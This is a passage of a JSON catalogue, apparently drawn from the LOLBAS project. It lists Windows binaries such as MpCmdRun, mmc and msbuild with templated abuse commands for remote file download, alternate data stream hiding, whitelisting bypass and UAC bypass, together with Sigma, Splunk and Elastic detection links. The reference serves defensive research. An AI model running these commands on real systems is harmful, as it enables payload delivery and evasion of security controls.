installation","aliases":[]},{"id":"lolbas:microsoft-workflow-compiler-exe:1","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:microsoft-workflow-compiler-exe:2","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mmc-exe:0","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Launch a 'backgrounded' MMC process and invoke a COM payload","usecase":"Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mmc-exe:1","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"mmc.exe gpedit.msc","description":"Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.","usecase":"Modify HKCU\\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.","mitre":["T1218.014"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mmc-exe:2","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Download and save an executable to disk","usecase":"Download file from Internet","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mofcomp-exe:0","toolId":"lolbas:mofcomp-exe","toolName":"Mofcomp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mofcomp.exe {PATH_ABSOLUTE:.mof}","description":"Abuse of mofcomp.exe to parse a file which contains MOF statements in order create new classes as part of the WMI repository","usecase":"Threat actors can use mofcomp.exe to register a malicious MOF file as a new class in the WMI repository","mitre":["T1047"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"strange parent processes spawning mofcomp.exe like cmd.exe or powershell.exe"},{"type":"Sigma","value":"https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml"}],"references":["https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp","https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-","https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/","https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/","https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96","https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpcmdrun-exe:0","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}","description":"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpcmdrun-exe:1","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"copy \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\" C:\\Users\\Public\\Downloads\\MP.exe && chdir \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\\" && \"C:\\Users\\Public\\Downloads\\MP.exe\" -DownloadFile -url {REMOTEURL:.exe} -path C:\\Users\\Public\\Downloads\\evil.exe","description":"Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpcmdrun-exe:2","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe","description":"Download file to machine and store it in Alternate Data Stream","usecase":"Hide downloaded data into an Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:0","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msbuild.exe {PATH:.xml}","description":"Build and execute a C# project stored in the target XML file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:1","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.csproj}","description":"Build and execute a C# project stored in the target csproj file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:2","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo","description":"Executes generated Logger DLL file with TargetLogger export.","usecase":"Execute DLL","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on 